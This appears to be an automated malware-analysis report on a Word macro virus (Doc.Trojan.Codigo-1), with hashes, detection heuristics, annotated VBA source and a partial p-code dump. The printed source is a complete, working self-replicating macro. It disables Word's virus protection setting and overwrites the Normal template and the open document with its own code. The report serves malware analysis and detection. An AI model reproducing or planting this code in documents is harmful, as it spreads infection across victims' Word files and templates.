Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bbed7cb46259b2f7…

MALICIOUS

Office (OLE)

35.0 KB Created: 2000-07-25 04:49:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 084067dc29fc56db8c58acd77eec7a50 SHA-1: 0b23ae884033534d59b6fefa864cce3792248e76 SHA-256: bbed7cb46259b2f7e43375226338267eb89358c262c5172bb8c4a00ef44aeaee
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains VBA macros: a Document_Open handler that copies its own code into the Normal.dot template and into the active document, and a Document_Close handler that calls Document_Open again and, if the current day of the month is after the 23rd, draws random lines on the document, which may be a distraction or a secondary payload trigger. The ClamAV detection as 'Doc.Trojan.Codigo-1' further supports its malicious nature.

Heuristics 3

  • ClamAV: Doc.Trojan.Codigo-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Codigo-1
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5285 bytes
SHA-256: 99f8ef02360e89f860f4acfb156b73ffe9ef76d611d9d8e060af47b01bb53e7d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst notes: the Attribute lines above are export metadata for the
' ThisDocument class module (VB_Base appears to point at the Normal template,
' consistent with the self-copying routine in Document_Open below). Note that
' the module has no Option Explicit, so undeclared names become Variants.
'Esta Infectado
' ^ Spanish: "It is infected" — an author marker; the visible code never
'   reads or searches for it.
' Analyst notes (Document_Close): runs when the document is closed. It
' re-runs the replication routine (Document_Open) and then, late in the
' month, draws 100 random line shapes on the document before saving both the
' document and the Normal template.
Private Sub Document_Close()
On Error Resume Next   ' every runtime error in this handler is silently ignored

' VBA applies the "As Integer" clause only to the last name, so only y2 is
' Integer; i, x1, x2 and y1 are Variants (matches the VarDefn list in the p-code)
Dim i, x1, x2, y1, y2 As Integer
Dim Figura


' Replication step: overwrites the Normal template's and this document's code module
Call Document_Open

Randomize
' Visible-payload trigger: only on days after the 23rd of the month
If Day(Now()) > 23 Then

  ' 100 line shapes with random endpoints in the range 0..999 (Int(1000 * Rnd))
  For i = 1 To 100
    x1 = Int(1000 * Rnd(1000))
    x2 = Int(1000 * Rnd(1000))
    y1 = Int(1000 * Rnd(1000))
    y2 = Int(1000 * Rnd(1000))
    Figura = ActiveDocument.Shapes.AddLine(x1, y1, x2, y2)
  Next i
End If

' Persist the document and the (now modified) Normal template
ActiveDocument.Save
NormalTemplate.Save

End Sub

' Analyst notes (Document_Open): the replication routine. It turns off Word's
' macro virus protection option, reads its own source from the first VBA
' component of the active document (falling back to the Normal template),
' then overwrites the first component of BOTH the Normal template and the
' active document with that source and saves both. Because the Normal
' template is loaded in every Word session, this presumably carries the
' macro into later documents — the usual macro-virus infection pattern.
Private Sub Document_Open()
On Error Resume Next   ' any failure (e.g. VBProject access being blocked) is silently ignored

' Only nt is typed As Object; ad is a Variant (the type clause applies to the last name only)
Dim ad, nt As Object
Dim MiCodigo As String          ' "MyCode": the macro's own source text
Dim DocInfectado As Boolean     ' declared but never used in this listing
Dim NormalInfectado As Boolean  ' declared but never used in this listing

' Disables Word's "macro virus protection" warning option (Word 97/2000-era setting)
Options.VirusProtection = False

'Inicializar Variables  (Spanish: "Initialise variables")
Set ad = ActiveDocument.VBProject.VBComponents.Item(1)   ' first VBA component of the open document
Set nt = NormalTemplate.VBProject.VBComponents.Item(1)   ' first VBA component of the Normal template

' Read the whole code module; if the document's module is empty, take the template's instead
MiCodigo = ad.CodeModule.Lines(1, ad.CodeModule.CountOfLines)
If Len(MiCodigo) < 1 Then
   MiCodigo = nt.CodeModule.Lines(1, nt.CodeModule.CountOfLines)
End If

' Typo in the original: EsteCogigo is declared but EsteCodigo is assigned and used.
' With no Option Explicit in this module the misspelt name is an implicit Variant, so it still works.
Dim EsteCogigo As String
    EsteCodigo = Mid(MiCodigo, 1, Len(MiCodigo))   ' a plain copy of MiCodigo

' Template infection: replace the Normal template's module with this code
nt.CodeModule.DeleteLines 1, nt.CodeModule.CountOfLines
nt.CodeModule.AddFromString EsteCodigo

' Document (re)infection: replace the document's own module with the same code
ad.CodeModule.DeleteLines 1, ad.CodeModule.CountOfLines
ad.CodeModule.AddFromString EsteCodigo

' Persist both so the change survives
NormalTemplate.Save
ActiveDocument.Save
End Sub


' Processing file: /opt/analyzer/scan_staging/30dc8605cadb4c8d873ee59f6f821aa3.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 6074 bytes
' Line #0:
' 	QuoteRem 0x0000 0x000E "Esta Infectado"
' Line #1:
' 	FuncDefn (Private Sub Document_Close())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' Line #4:
' 	Dim 
' 	VarDefn i
' 	VarDefn x1
' 	VarDefn x2
' 	VarDefn y1
' 	VarDefn y2 (As Integer)
' Line #5:
' 	Dim 
' 	VarDefn Figura
' Line #6:
' Line #7:
' Line #8:
' 	ArgsCall (Call) Document_Open 0x0000 
' Line #9:
' Line #10:
' 	ArgsCall Read 0x0000 
' Line #11:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x0017 
' 	Gt 
' 	IfBlock 
' Line #12:
' Line #13:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0064 
' 	For 
' Line #14:
' 	LitDI2 0x03E8 
' 	LitDI2 0x03E8 
' 	ArgsLd Rnd 0x0001 
' 	Mul 
' 	FnInt 
' 	St x1 
' Line #15:
' 	LitDI2 0x03E8 
' 	LitDI2 0x03E8 
' 	ArgsLd Rnd 0x0001 
' 	Mul 
' 	FnInt 
' 	St x2 
' Line #16:
' 	LitDI2 0x03E8 
' 	LitDI2 0x03E8 
' 	ArgsLd Rnd 0x0001 
' 	Mul 
' 	FnInt 
' 	St y1 
' Line #17:
' 	LitDI2 0x03E8 
' 	LitDI2 0x03E8 
' 	ArgsLd Rnd 0x0001 
' 	Mul 
' 	FnInt 
' 	St y2 
' Line #18:
' 	Ld x1 
' 	Ld y1 
' 	Ld x2 
' 	Ld y2 
' 	Ld ActiveDocument 
' 	MemLd Shapes 
' 	ArgsMemLd AddLine 0x0004 
' 	St Figura 
' Line #19:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #20:
' 	EndIfBlock 
' Line #21:
' Line #22:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #23:
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' Line #24:
' Line #25:
' 	EndSub 
' Line #26:
' Line #27:
' 	FuncDefn (Private Sub Document_Open())
' Line #28:
' 	OnError (Resume Next) 
' Line #29:
' Line #30:
' 	Dim 
' 	VarDefn ad
' 	VarDefn nt (As Object)
' Line #31:
' 	Dim 
' 	VarDefn MiCodigo (As String)
' Line #32:
' 	Dim 
' 	VarDefn DocInfectado (As Boolean)
' Line #33:
' 	Dim 
' 	VarDefn NormalInfectado (As Boolean)
' Line #34:
' Line #35:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #36:
' Line #37:
' 	QuoteRem 0x0000 0x0015 "Inicializar Variables"
' Line #38:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set ad 
' Line #39:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set nt 
' Line #40:
' Line #41:
' 	LitDI2 0x0001 
' 	Ld ad 
' 	MemLd CodeModule 
' 	MemLd CountOfLines 
' 	Ld ad 
' 	Mem
... (truncated)